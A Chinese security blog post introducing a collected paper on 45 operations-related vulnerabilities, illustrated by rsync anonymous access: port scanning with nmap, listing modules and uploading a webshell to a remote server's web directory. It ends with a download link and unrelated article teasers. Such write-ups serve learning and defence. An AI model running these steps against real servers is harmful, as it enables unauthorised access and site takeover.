【漏洞赏析】安全运维那些洞

0x00 缘由

有人说:编程是一种美,是一门艺术,享受其中思维的妙曼身姿,一个有灵魂的程序猿叫做万物的“造物主”;

而我说:漏洞是一种美,是一个世界,畅游于黑暗的世界里探索,一个有个性的白帽子叫做世间的“救世主”。

0x01 概括

不知从何时起,养成了一个喜欢看“漏洞”的习惯,乌云的离开让很多人伤心而遗憾。不知从何时起,养成了一个喜欢记笔记、总结、思考的习惯,于是有了今天这份paper:

或许,很多朋友已经看到过标题,因为之前没有自己的公众号在T00Ls发过,后来又被人转到过爱春秋。现在打算开始尝试公众号,想起是时候把它纳入怀中了。

0x02 结构

这份 paper 没有太多个人思路,但却不失某一漏洞的利用方法及遇到的问题(当时有的没有解决,然而后来也没有继续补充)。仅单纯的按照自己的思路,记录和总结常见的运维相关安全漏洞。难免会有错误与不足(包括不全面)之处,还请大家不吝赐教。

1)很早之前为止,共收集运维相关漏洞45例

2)每例结构分为:基础知识、漏洞利用、实战演练(及修复方案)

以rsync匿名访问为例:

--1 基础知识

rsync 是一个远程数据同步工具,用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。

下载文件:

./rsync -vzrtopg --progress --delete username@xxx.xxx.xxx.xxx::out /home/test/getfile

上传文件:

/user/bin/rsync -vzrtopg --progress /home/test/getfile username@xxx.xxx.xxx.xxx::out

--2 利用方法

rsync 默认端口是 873,可使用 nmap 进行扫描:

nmap –n –open –p 873 x.x.x.x/24

尝试上传、下载文件( kali 中):rsync 10.210.208.39::

或 rsync –vvvv rsync://10.210.208.39::

--3 实战演练

获取文件信息找到网站目录:# rsync -v xx.xx.xx.xx::

同步本地大马至远程服务器,上传webshell

# rsync -av /root/Desktop/youxiu.aspx xx.xx.xx.xx::Etest

确认是否成功: # rsync -v xx.xx.xx.xx::Etest

获取目标webshell:

3)每例中可能是一类漏洞的集合

比如struts漏洞:

又如web服务器解析漏洞:

0x03 结语

以上漏洞大餐可能时间较久,如果有想继续完善的朋友可以留言。

下载链接如下(下载即同意以上PS中的内容):

链接: https://pan.baidu.com/s/1o8mlfAE 密码: mk4d

原文发布于微信公众号 - 我的安全视界观(CANI_Security)

原文发表时间:2017-11-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

漏洞预警 | FFmpeg曝任意文件读取漏洞

最近有白帽在HackerOne平台上报了ffmpeg漏洞,该漏洞利用ffmpeg的HLS播放列表处理方式,可导致本地文件曝光。 漏洞描述 6月24日,Hacke...

3565
来自专栏云计算教程系列

如何在Ubuntu上搭建方舟:生存进化服务器

《方舟:生存进化》(英语:Ark: Survival Evolved)是一款由Studio Wildcard制作与发行的生存类沙盒动作冒险游戏,使用虚幻4引擎打...

7843
来自专栏黑白安全

利用kali linux制作网站钓鱼攻击

社会工程学:一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段取得自身利益的手法。

3171
来自专栏程序员的碎碎念

What‘s docker?How to study?

看图说话:“一只可爱的大鲸鱼上面摆放着许多小箱子,而这些小箱子呢--就是应用程序,鲸鱼就是操作系统”。 大家应该都知道集装箱吧,不过你是什么货物,通过什么运输方...

1162
来自专栏FreeBuf

五大安全研究者必用的搜索引擎

CNN 曾在 2013 年 4 月 8 日 的新闻报道中称 Shodan 是“互联网上最可怕的搜索引擎”。 甚至光是听它的名字,就让人觉得不寒而栗! 那只是三年...

2267
来自专栏程序猿DD

浅谈微服务基建的逻辑

这篇文章主要目的是面向初接触微服务的朋友简单介绍微服务基础建设所需要的各个模块以及缘由。 起点 首先,我们得有一个“服务”。根据定义,我们可以把每个服务实例都视...

3528
来自专栏北京马哥教育

有福了!六步使用Python写一个小小的自动化项目监控

本文由马哥教育Python自动化实战班5期学员推荐,转载自互联网,作者为 Defshine,内容略经小编改编和加工,观点跟作者无关,最后感谢作者的辛苦贡献与付出...

1.4K10
来自专栏技术翻译

比较Windows和Linux SQL容器

通过多种方法,Windows SQL Server容器提供比Linux MySQL或Postgres容器更好的企业支持。SQL Server容器提供更多的向后兼...

1330
来自专栏带你撸出一手好代码

请给你的电脑加上固态硬盘

电脑速度慢,那是老生常谈的话题了。 不管是笔记本电脑还是台式机,是二三千块DIY的货色还是上万土豪配置, 在新系统刚装好那会, 使用起来肯定是顺滑如丝一般的感觉...

3025
来自专栏ThoughtWorks

浅谈微服务基建的逻辑 | 洞见

这篇文章主要目的是面向初接触微服务的朋友简单介绍微服务基础建设所需要的各个模块以及缘由。 起点 首先,我们得有一个“服务”。根据定义,我们可以把每个服务实例都视...

3535

扫码关注云+社区